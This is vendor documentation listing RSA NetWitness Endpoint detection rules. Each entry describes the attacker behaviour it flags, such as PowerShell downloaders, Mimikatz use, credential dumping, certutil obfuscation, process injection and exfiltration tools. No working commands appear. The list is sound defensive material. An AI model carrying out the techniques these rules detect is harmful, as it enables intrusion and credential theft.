RSA Application Rules for Endpoint

Document created by RSA Information Design and Development on Apr 10, 2019Last modified by RSA Information Design and Development on Jun 17, 2019
Version 9Show Document
  • View in full screen mode
 

The following table lists the RSA Application Rules for NetWitness Endpoint.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
Display NameFile NameDescription
Accesses Administrative Share Using Command Shellaccesses_administrative_share_using_command_shellAccessing administrative share using command shell can be an indicator of someone trying for lateral movement or privilege escalation by using hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. This rule is supported for Windows 8 and higher versions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = accesses administrative share using command shell
Runs File Attributes Modification Toolruns_file_attributes_modification_toolRunning file attributes modification tool can be an indication of adversaries trying use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file attributes modification tool
Runs DNS Lookup Toolruns_dns_lookup_toolRunning nslookup.exe can be used to get information about the Domain Name System (DNS) being used by the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs dns lookup tool
Runs Dittoruns_dittoDitto copies files and directories from the Mac terminal.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ditto
Runs Curlruns_curlCurl is used in command lines or scripts to transfer data via URLs.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs curl
Runs Credential Dumping Toolsruns_credential_dumping_toolsRunning credential dumping tools can be indication of someone trying to bypass all credentials checks to be able to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = loads credential dumping library
Runs Chmodruns_chmodChmod is used to modify file and directory permissions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs chmod
Runs Chained Command Shellruns_chained_command_shellRunning chained command shell can be an indication of someone trying to run multiple malicious commands needed to perform multi-stage attack to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs chained command shell
Runs Certutil With Hashfile Argumentsruns_certutil_with_hashfile_argumentsWindows certificate managing utility program - CertUtil can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with hashfile argument can be an indication of someone trying to obfuscate malicious files to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with hashfile arguments
Runs Certutil With Encode Argumentsruns_certutil_with_encode_argumentsWindows certificate managing utility program - CertUtil can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with encode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with encode arguments
Runs Certutil With Decode Argumentsruns_certutil_with_decode_argumentsWindows certificate managing utility program - CertUtil can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with decode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with decode arguments
Runs Blacklisted Fileruns_blacklisted_fileAn analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files as the destination process, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs blacklisted file
Runs Binary Located In System Volume Information Directoryruns_binary_located_in_system_volume_information_directory

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in system volume information directory
Runs Binary Located In Root Of Users Directoryruns_binary_located_in_root_of_users_directoryWhile the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of a users home directory and is sometimes used by malware.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of users directory
Runs Binary Located In Root Of Program Directoryruns_binary_located_in_root_of_program_directoryWith the ProgramData being hidden in Windows by default, the main use of this folder is for application data that is not user specific, meaning that it applies to "All Users". If malware was to be placed here, it would run on any user that would log into the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of program directory
Runs Binary Located In Root Of Logical Driveruns_binary_located_in_root_of_logical_driveWhile the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of "C:" directory.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of logical drive
Runs Binary Located In Recycle Bin Directoryruns_binary_located_in_recycle_bin_directoryA technique has been used by malware authors where a malicious file or process is invoked and running out of the $RECYCLE.BIN folder on Windows systems.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in recycle bin directory
Runs Active Directory Service Query Toolruns_active_directory_service_query_toolRunning active directory service query can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs active directory service query tool
Runs ACL Management Toolruns_acl_management_toolRunning ACL management tool can be an indication of someone trying to run multiple malicious commands needed to perform multi-stage attack to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs acl management tool
Rundll32 Runs Powershellrundll32_runs_powershellRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 runs powershell
Rundll32 Creates Windows Taskrundll32_creates_windows_taskRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 creates windows task
RPM Hash Mismatch In Important System Directoryrpm_hash_mismatch_in_important_system_directoryA hash mismatch may indicate a file has been altered from its original state and call into question its integrity. Since RPMs typically contain compiled software this could mean an attacker is trying to disguise malicious malware as legitimate.
RPM Hash Mismatchrpm_hash_mismatchA hash mismatch may indicate a file has been altered from its original state and call into question its integrity. Since RPMs typically contain compiled software this could mean an attacker is trying to disguise malicious malware as legitimate.
Regsvr32 Writes Executableregsvr32_writes_executableRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. Regsvr32 writing an executable could indicate delivery of a backdoor to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 writes executable
Runs File Transfer Toolruns_file_transfer_toolRunning a file transfer program can be an indication of an adversary potentially performing data exfiltration to an off site location

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file transfer tool
Runs forfiles.exeruns_forfiles.exeRunnnig forfiles.exe can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs forfiles.exe
Runs Graylisted Fileruns_graylisted_fileAn analyst may mark files as graylisted within NetWitness Endpoint. If actions on an endpoint involve those graylisted files as the destination process, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs graylisted file
Runs Ifconfigruns_ifconfigThe ifconfig utility is used to assign an address to a network interface or configure network interface parameters.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ifconfig
Runs Powershell With HTTP Argumentruns_powershell_with_http_argumentRunning powershell with HTTP argument can be an indication of someone trying to connect and render malicious commands/downloaders from internet, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with http argument
Runs Powershell With Hidden Windowruns_powershell_with_hidden_windowRunning powershell with hidden window can be an indication of someone trying to run malicious commands in stealth mode so that powershell window is not visible to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with hidden window
Runs Powershell Using Environment Variablesruns_powershell_using_environment_variablesRunning powershell using environment variables can be an indication of someone trying to run malicious commands with particular variables like path to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using environment variables
Runs Powershell Using Encoded Commandruns_powershell_using_encoded_commandRunning powershell using encoded command can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using encoded command
Runs Powershell ShellExecute Functionruns_powershell_shellexecute_functionRunning powershell ShellExecute function can be an indication of someone trying to execute malicious shell code to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell shellexecute function
Runs Powershell Memory Stream Functionruns_powershell_memory_stream_functionRunning powershell memory stream function can be an indication of someone trying to execute malicious I/O commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell memory stream function
Runs Powershell Invoke-Mimikatz Functionruns_powershell_invoke-mimikatz_functionMimikatz has become an extremely effective attack tool against Windows clients. Running powershell Invoke-Mimikatz function is an indication of someone trying to use Mimikatz to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs powershell invoke-mimikatz function
Runs Powershell Downloading Contentruns_powershell_downloading_contentAttackers mainly use PowerShell as a downloader on windows based systems. Running powershell downloading content can be an indication of someone trying to download malicious payloads from internet to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell downloading content
Runs Powershell Defining Functionruns_powershell_defining_functionRunning powershell defining functions can be an indication of someone trying to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell defining function
Runs Powershell Decoding Base64 Stringruns_powershell_decoding_base64_stringRunning powershell decoding base64 string can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell decoding base64 string
Runs Powershell Bypassing Execution Policyruns_powershell_bypassing_execution_policyRunning powershell bypassing execution policy will ignore the execution policy restrictions to run commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell bypassing execution policy
Regsvr32 Runs Rundll32regsvr32_runs_rundll32Regsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. This rule detects unusual behavior in the form of registration and run of a DLL in the same command.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs rundll32
Runs Powershellruns_powershellCommon cyber criminals and targeted attackers heavily use PowerShell, as its flexibility makes it an ideal attack tool for windows based systems. Running powershell can be an indication of someone trying to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs powershell
Runs One Letter Scriptruns_one_letter_scriptA single letter file can be a potential indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program to a single letter to allow quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter script
Runs One Letter Executableruns_one_letter_executableA single letter file can be a potential indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program to a single letter to allow quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter executable
Runs Network Connectivity Toolruns_network_connectivity_toolRunning network connectivity tool can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs network connectivity tool
Runs Network Configuration Toolruns_network_configuration_toolNetsh.exe is a command-line utility that will allow someone to display or change the network configuration of local or remote computer

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs network configuration tool
Runs Netstatruns_netstatNetstat is a network utility tool that can be used to discover network topology, statistics and performance information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs netstat
Runs Mshta With Script Argumentruns_mshta_with_script_argumentMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with a script argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with script argument
Runs Mshta With HTTP Argumentruns_mshta_with_http_argumentMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with an HTTP argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with http argument
Runs Malicious File By Reputation Serviceruns_malicious_file_by_reputation_serviceFiles reported as malicious by reputation service indicates execution of files and hashes of which are tagged as malicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs malicious file by reputation service
Runs Launchctlruns_launchctlLaunchctl is used to control services.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs launchctl
Runs Kextstatruns_kextstatDisplay status of loaded kernel extensions (kexts).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextstat
Runs Kextloadruns_kextloadThe kextload program is used to load kernel extensions (kexts). For most kexts, kextload must run as the superuser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextload
Runs Pingruns_pingPing is used to see if a host is reachable on a network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ping
Runs Powershell With Long Argumentsruns_powershell_with_long_argumentsRunning powershell with long arguments can be an indication of someone trying to run malicious powershell commands, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with long arguments
Regsvr32 Runs Powershellregsvr32_runs_powershellRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs powershell
Registry Tools Disabledregistry_tools_disabledAn administrative user has disabled access to the registry editor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = registry tools disabled
Opens OS Processopens_os_processThis may indicate Process injection which is a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens os process
Opens Browser Processopens_browser_processWhen a file not digitally signed by apple opens broswer process it might indicate adversary effort for process injection into browser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens browser process
Office Application Writes Executableoffice_application_writes_executableA Microsoft Office application writing an executable may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application writes executable
Office Application Runs WMI Scripting Engineoffice_application_runs_wmi_scripting_engineA Microsoft Office application running Windows Management Instrumentation (WMI) may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs wmi scripting engine
Office Application Runs Task Scheduleroffice_application_runs_task_schedulerA Microsoft Office application running a job or scheduling a task may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs task scheduler
Office Application Runs Scripting Engineoffice_application_runs_scripting_engineA Microsoft Office application running a scripting engine may indicate a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripting engine
Office Application Runs Scripted FTPoffice_application_runs_scripted_ftpA Microsoft Office application running scripted FTP may indicate a spearphishing attachment with a malicious payload. FTP may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripted ftp
Office Application Runs Powershelloffice_application_runs_powershellA Microsoft Office application running powershell may indicate a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs powershell
Office Application Runs Command Promptoffice_application_runs_command_promptA Microsoft Office application running the command prompt may indicate a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs command prompt
Office Application Runs BITSoffice_application_runs_bitsA Microsoft Office application running Background Intelligent Transfer Service (BITS) may indicate a spearphishing attachment with a malicious payload. BITS may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs bits
Office Application Injects Remote Processoffice_application_injects_remote_processA Microsoft Office application injecting a remote process may indicate a spearphishing attachment with a malicious payload. Process injection may enable an attacker to gain access to system resources or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application injects remote process
Office Application Crashedoffice_application_crashedMicrosoft Office application crashes can happen fairly frequently, but this may be interesting in combination with other indicators involving those applications.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application crashed
Writes Malicious File By Reputation Servicewrites_malicious_file_by_reputation_serviceFiles reported as malicious by reputation service indicates execution of files and hashes of which are tagged as malicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = writes malicious file by reputation service
Non-Microsoft Modifies Zone Crossing Warning Settingnon-microsoft_modifies_zone_crossing_warning_settingNon-Microsoft modifing zone crossing warning setting can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies zone crossing warning setting
Non-Microsoft Modifies Windows System Policynon-microsoft_modifies_windows_system_policyNon-Microsoft modifieing windows system policy can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies windows system policy
Non-Microsoft Modifies Task Manager Settingnon-microsoft_modifies_task_manager_settingNon-Microsoft modifing task manager setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies task manager setting
Non-Microsoft Modifies Services ImagePathnon-microsoft_modifies_services_imagepathNon-Microsoft modifing services ImagePath can be an indication of someone trying to modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies services imagepath
Non-Microsoft Modifies Security Center Confignon-microsoft_modifies_security_center_configNon-Microsoft modifing security center config can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies security center config
Non-Microsoft Modifies Registry Editor Settingnon-microsoft_modifies_registry_editor_settingNon-Microsoft modifing registry editor setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies registry editor setting
Non-Microsoft Modifies LUA Settingnon-microsoft_modifies_lua_settingNon-Microsoft modifing LUA setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies lua setting
Non-Microsoft Modifies Internet Zone Settingnon-microsoft_modifies_internet_zone_settingAdding firewall rule can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies internet zone setting
Non-Microsoft Modifies Firewall Policynon-microsoft_modifies_firewall_policyNon-Microsoft modifing firewall policy can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies firewall policy
Non-Microsoft Modifies Bad Certificate Warning Settingnon-microsoft_modifies_bad_certificate_warning_settingNon-Microsoft modifing bad certificate warning setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies bad certificate warning setting
Opens Processopens_processThis may indicate Process injection which is a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens process
PackedpackedMalware may use packing applications to repackage itself frequently to evade threat detection solutions based on static signatures.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed
Packed And Autorunpacked_and_autorunAdversaries use Software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. To ensure persistence across reboots attackers configure to run those on system startup.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and autorun
Packed And Network Accesspacked_and_network_accessAdversaries use software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. This file is trying to gain access to the network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and network access
Registers Shim Databaseregisters_shim_databaseMicrosoft Windows Application Compatibility Toolkit (ACT) enables shims to be used to provide backwards compatibility for older versions of Windows or legacy applications. Malicious actors may use shims to gain persistence or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = registers shim database
Record Screen Captures Using PSR Toolrecord_screen_captures_using_psr_toolRecording screen captures using PSR tool can be an indicator of an adversaries attempting to take screen captures of the desktop to gather information over the course of an operation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = record screen captures using psr tool
Queries Users Logged On Remote Systemqueries_users_logged_on_remote_systemQuerying users logged on remote system can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on remote system
